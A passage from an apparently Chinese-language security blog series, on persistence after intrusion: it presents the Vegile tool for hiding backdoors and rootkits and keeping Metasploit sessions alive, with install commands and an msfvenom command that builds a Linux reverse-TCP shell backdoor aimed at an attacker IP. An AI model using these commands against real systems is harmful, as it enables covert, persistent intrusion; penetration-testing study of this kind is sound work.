【Day24】维持权限 — 隐藏後门(一)
哈罗~
来review一下,
之前提到维持权限时,
攻击者会建立後门或Rootkit,
并且会隐藏其恶意档案/程序。
今天要来介绍一个隐藏後门或Rootkit的小工具。
Vegile
这个工具是当我们已设置好後门或Rootkit时,
可以协助我们来隐藏其踪迹,
并且会无限的连接Metasploit来保持Session。
环境:Kali ─攻击方(192.168.168.131)
-
安装Vegile。
git clone https://github.com/Screetsec/Vegile.git cd Vegile chmod +x Vegile
-
可透过
./Vegile --h来查看参数说明。
-
透过metaspolit中的msfvenom来制作一个後门。
msfvenom -p linux/x64/shell/reverse_tcp lhost=[攻击者IP] lport=[自订port] -f elf -o [自订後门的路径]msfvenom 参数说明:
| 参数 | 说明 |
|---|---|
| -p | 指定需要使用的payload |
| -l | 列出模组类型(payloads、encoders、nops、all) |
| -f | 指定输出格式(format) |
| -b | 要规避的字符(bad char) |
| -a | 指定目标系统的架构(x86 or x64) |
| -i | payload的编码次数 |
| -o | 输出payload的路径跟档名 |
更多msfvenom参数说明可使用`msfvenom -h`。
小结
今天开始双十连假,
在连假第一天凌晨,
我们建立了一个後门。
先休息一下...
明天继续...
睡罗! 高歌离席~
<<: 【在 iOS 开发路上的大小事-Day27】透过 Firebase 来管理资料 (Cloud Firestore 篇) Part1
Day 09 | Livewire 生命周期勾 Lifecycle Hooks
在 Vue.js 有的生命周期在 Livewire 中也都有,除此之外在 Livewire 中各自变...
找LeetCode上简单的题目来撑过30天啦(DAY15)
题号:2007 标题:Find Original Array From Doubled Array ...
Day-5 :阿公阿嬷都看得懂的前後端分离架构?
前端系虾米? 身为一个麻瓜,当初在看到前端两个字, 着实就猜想不就字面意思?应该系前後面,反之另一个...
『比昨天的自己还要好』的菜鸟工程师
回顾 30天咻的一下就过去了,第一次的铁人赛暂时画下小句点,那些期待补的篇幅我没忘(?) 漂向何处 ...
Python - Python3 虚拟环境参考笔记
Python - Python3 虚拟环境参考笔记 参考资料 资料来源:架设 Django 开发环境...